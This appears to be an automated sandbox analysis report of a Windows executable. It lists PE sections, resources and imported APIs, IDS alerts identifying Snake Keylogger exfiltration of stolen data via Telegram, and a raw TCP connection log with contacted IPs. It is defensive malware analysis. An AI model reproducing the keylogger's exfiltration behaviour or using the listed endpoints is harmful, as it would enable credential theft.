                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x10000x64090x6600bfe2b726d49cbd922b87bad5eea65e61False0.6540287990196079data6.416186322230332IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                          .rdata0x80000x13960x1400d45dcba8ca646543f7e339e20089687eFalse0.45234375data5.154907432640367IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .data0xa0000x203580x6008575fc5e872ca789611c386779287649False0.5026041666666666data4.004402321344153IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .ndata0x2b0000x2a0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .rsrc0x550000x210680x2120003ed2ed76ba15352dac9e48819696134False0.8714696344339623data7.556190648348207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                          RT_BITMAP0x554c00x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                          RT_ICON0x558280xc2a3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9966684729162903
                                                                                                          RT_ICON0x61ad00x86e0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.990210843373494
                                                                                                          RT_ICON0x6a1b00x5085PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9867559307233299
                                                                                                          RT_ICON0x6f2380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4358921161825726
                                                                                                          RT_ICON0x717e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4896810506566604
                                                                                                          RT_ICON0x728880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5367803837953091
                                                                                                          RT_ICON0x737300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.6913357400722022
                                                                                                          RT_ICON0x73fd80x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.38597560975609757
                                                                                                          RT_ICON0x746400x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.4934971098265896
                                                                                                          RT_ICON0x74ba80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.651595744680851
                                                                                                          RT_ICON0x750100x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.46908602150537637
                                                                                                          RT_ICON0x752f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5472972972972973
                                                                                                          RT_DIALOG0x754200x120dataEnglishUnited States0.53125
                                                                                                          RT_DIALOG0x755400x118dataEnglishUnited States0.5678571428571428
                                                                                                          RT_DIALOG0x756580x120dataEnglishUnited States0.5104166666666666
                                                                                                          RT_DIALOG0x757780xf8dataEnglishUnited States0.6330645161290323
                                                                                                          RT_DIALOG0x758700xa0dataEnglishUnited States0.6125
                                                                                                          RT_DIALOG0x759100x60dataEnglishUnited States0.7291666666666666
                                                                                                          RT_GROUP_ICON0x759700xaedataEnglishUnited States0.6091954022988506
                                                                                                          RT_VERSION0x75a200x308dataEnglishUnited States0.47036082474226804
                                                                                                          RT_MANIFEST0x75d280x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                                          DLLImport
                                                                                                          KERNEL32.dllExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                          USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                          SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                                          ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                          COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                          ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                          EnglishUnited States
                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2025-01-10T21:16:56.799124+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.849795142.250.184.206443TCP
                                                                                                          2025-01-10T21:17:01.773424+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849827193.122.6.16880TCP
                                                                                                          2025-01-10T21:17:09.914055+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849827193.122.6.16880TCP
                                                                                                          2025-01-10T21:17:10.539561+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849877149.154.167.220443TCP
                                                                                                          2025-01-10T21:17:10.874170+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849877149.154.167.220443TCP
                                                                                                          2025-01-10T21:17:11.789066+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849888132.226.247.7380TCP
                                                                                                          2025-01-10T21:17:12.347630+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849893149.154.167.220443TCP
                                                                                                          2025-01-10T21:17:12.691079+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849893149.154.167.220443TCP
                                                                                                          2025-01-10T21:17:14.000023+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849906149.154.167.220443TCP
                                                                                                          2025-01-10T21:17:14.330984+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849906149.154.167.220443TCP
                                                                                                          2025-01-10T21:17:15.637564+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849918149.154.167.220443TCP
                                                                                                          2025-01-10T21:17:15.992211+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849918149.154.167.220443TCP
                                                                                                          2025-01-10T21:17:17.310980+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849930149.154.167.220443TCP
                                                                                                          2025-01-10T21:17:17.899459+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849930149.154.167.220443TCP
                                                                                                          2025-01-10T21:17:19.197370+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849946149.154.167.220443TCP
                                                                                                          2025-01-10T21:17:19.567198+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849946149.154.167.220443TCP
                                                                                                          2025-01-10T21:17:20.887708+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849958149.154.167.220443TCP
                                                                                                          2025-01-10T21:17:21.272538+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849958149.154.167.220443TCP
                                                                                                          2025-01-10T21:17:22.602991+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849971149.154.167.220443TCP
                                                                                                          2025-01-10T21:17:22.988453+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849971149.154.167.220443TCP
                                                                                                          2025-01-10T21:17:24.335626+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849983149.154.167.220443TCP
                                                                                                          2025-01-10T21:17:24.707595+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849983149.154.167.220443TCP
                                                                                                          2025-01-10T21:17:26.018875+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849996149.154.167.220443TCP
                                                                                                          2025-01-10T21:17:26.409909+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849996149.154.167.220443TCP
                                                                                                          2025-01-10T21:17:30.627335+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849998149.154.167.220443TCP
                                                                                                          2025-01-10T21:17:30.991256+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849998149.154.167.220443TCP
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 10, 2025 21:16:55.769213915 CET49795443192.168.2.8142.250.184.206
                                                                                                          Jan 10, 2025 21:16:55.769247055 CET44349795142.250.184.206192.168.2.8
                                                                                                          Jan 10, 2025 21:16:55.769306898 CET49795443192.168.2.8142.250.184.206
                                                                                                          Jan 10, 2025 21:16:55.780404091 CET49795443192.168.2.8142.250.184.206
                                                                                                          Jan 10, 2025 21:16:55.780427933 CET44349795142.250.184.206192.168.2.8
                                                                                                          Jan 10, 2025 21:16:56.424391985 CET44349795142.250.184.206192.168.2.8
                                                                                                          Jan 10, 2025 21:16:56.424479961 CET49795443192.168.2.8142.250.184.206
                                                                                                          Jan 10, 2025 21:16:56.426244974 CET44349795142.250.184.206192.168.2.8
                                                                                                          Jan 10, 2025 21:16:56.426306009 CET49795443192.168.2.8142.250.184.206
                                                                                                          Jan 10, 2025 21:16:56.479101896 CET49795443192.168.2.8142.250.184.206
                                                                                                          Jan 10, 2025 21:16:56.479134083 CET44349795142.250.184.206192.168.2.8
                                                                                                          Jan 10, 2025 21:16:56.479639053 CET44349795142.250.184.206192.168.2.8
                                                                                                          Jan 10, 2025 21:16:56.479706049 CET49795443192.168.2.8142.250.184.206
                                                                                                          Jan 10, 2025 21:16:56.483421087 CET49795443192.168.2.8142.250.184.206
                                                                                                          Jan 10, 2025 21:16:56.527334929 CET44349795142.250.184.206192.168.2.8
                                                                                                          Jan 10, 2025 21:16:56.799123049 CET44349795142.250.184.206192.168.2.8
                                                                                                          Jan 10, 2025 21:16:56.800066948 CET44349795142.250.184.206192.168.2.8
                                                                                                          Jan 10, 2025 21:16:56.800220966 CET49795443192.168.2.8142.250.184.206
                                                                                                          Jan 10, 2025 21:16:56.801635981 CET49795443192.168.2.8142.250.184.206
                                                                                                          Jan 10, 2025 21:16:56.801662922 CET44349795142.250.184.206192.168.2.8
                                                                                                          Jan 10, 2025 21:16:56.852108955 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:16:56.852158070 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:16:56.852256060 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:16:56.852544069 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:16:56.852559090 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:16:57.506761074 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:16:57.506979942 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:16:57.512111902 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:16:57.512140989 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:16:57.512387037 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:16:57.515575886 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:16:57.515950918 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:16:57.563324928 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.231838942 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.231904984 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.233050108 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.233114958 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.245717049 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.245794058 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.245804071 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.245840073 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.251971006 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.252049923 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.322345018 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.322402954 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.322417974 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.322454929 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.322458982 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.322472095 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.322501898 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.322540045 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.322577000 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.322621107 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.322765112 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.322810888 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.322817087 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.322861910 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.329133987 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.329190016 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.329199076 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.329243898 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.335395098 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.335455894 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.335464954 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.335514069 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.341726065 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.341793060 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.341799974 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.341835976 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.348000050 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.348079920 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.348087072 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.348124981 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.354404926 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.354479074 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.354485989 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.354522943 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.360124111 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.360212088 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.360225916 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.360265970 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.366039991 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.366101027 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.366107941 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.366147995 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.371841908 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.371900082 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.371913910 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.371958017 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.377548933 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.377607107 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.386321068 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.386384010 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.386392117 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.386430979 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.412925005 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.413001060 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.413036108 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.413049936 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.413060904 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.413075924 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.413124084 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.413157940 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.413197994 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.413211107 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.413252115 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.413491011 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.413542986 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.413553953 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.413599014 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.413605928 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.413645983 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.413650990 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.413692951 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.414138079 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.414192915 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.414197922 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.414242029 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.419682026 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.419792891 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.419814110 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.419852972 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.424460888 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.424524069 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.424549103 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.424592972 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.429414988 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.429496050 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.429513931 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.429554939 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.434007883 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.434077978 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.434099913 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.434138060 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.438699007 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.438745975 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.438754082 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.438791990 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.443387985 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.443478107 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.443484068 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.443523884 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.448013067 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.448076963 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.448084116 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.448121071 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.452655077 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.452696085 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.452701092 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.452748060 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.457309961 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.457370996 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.457376957 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.457410097 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.461725950 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.461776018 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.461781025 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.461819887 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.465956926 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.466016054 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.466022968 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.466063976 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.466068983 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.466114044 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.466119051 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.466161966 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.466169119 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.466178894 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.466200113 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.466208935 CET44349801142.250.184.193192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.466233969 CET49801443192.168.2.8142.250.184.193
                                                                                                          Jan 10, 2025 21:17:00.856647968 CET4982780192.168.2.8193.122.6.168
                                                                                                          Jan 10, 2025 21:17:00.861438036 CET8049827193.122.6.168192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.861502886 CET4982780192.168.2.8193.122.6.168
                                                                                                          Jan 10, 2025 21:17:00.861711979 CET4982780192.168.2.8193.122.6.168
                                                                                                          Jan 10, 2025 21:17:00.866471052 CET8049827193.122.6.168192.168.2.8
                                                                                                          Jan 10, 2025 21:17:01.515934944 CET8049827193.122.6.168192.168.2.8
                                                                                                          Jan 10, 2025 21:17:01.530189991 CET4982780192.168.2.8193.122.6.168
                                                                                                          Jan 10, 2025 21:17:01.535098076 CET8049827193.122.6.168192.168.2.8
                                                                                                          Jan 10, 2025 21:17:01.733083010 CET8049827193.122.6.168192.168.2.8
                                                                                                          Jan 10, 2025 21:17:01.773423910 CET4982780192.168.2.8193.122.6.168
                                                                                                          Jan 10, 2025 21:17:03.228966951 CET49843443192.168.2.8104.21.48.1
                                                                                                          Jan 10, 2025 21:17:03.228996992 CET44349843104.21.48.1192.168.2.8
                                                                                                          Jan 10, 2025 21:17:03.229057074 CET49843443192.168.2.8104.21.48.1
                                                                                                          Jan 10, 2025 21:17:03.232363939 CET49843443192.168.2.8104.21.48.1
                                                                                                          Jan 10, 2025 21:17:03.232374907 CET44349843104.21.48.1192.168.2.8
                                                                                                          Jan 10, 2025 21:17:03.698580980 CET44349843104.21.48.1192.168.2.8
                                                                                                          Jan 10, 2025 21:17:03.698679924 CET49843443192.168.2.8104.21.48.1
                                                                                                          Jan 10, 2025 21:17:03.717092991 CET49843443192.168.2.8104.21.48.1
                                                                                                          Jan 10, 2025 21:17:03.717118025 CET44349843104.21.48.1192.168.2.8
                                                                                                          Jan 10, 2025 21:17:03.717473030 CET44349843104.21.48.1192.168.2.8
                                                                                                          Jan 10, 2025 21:17:03.743784904 CET49843443192.168.2.8104.21.48.1
                                                                                                          Jan 10, 2025 21:17:03.787326097 CET44349843104.21.48.1192.168.2.8
                                                                                                          Jan 10, 2025 21:17:03.871495962 CET44349843104.21.48.1192.168.2.8
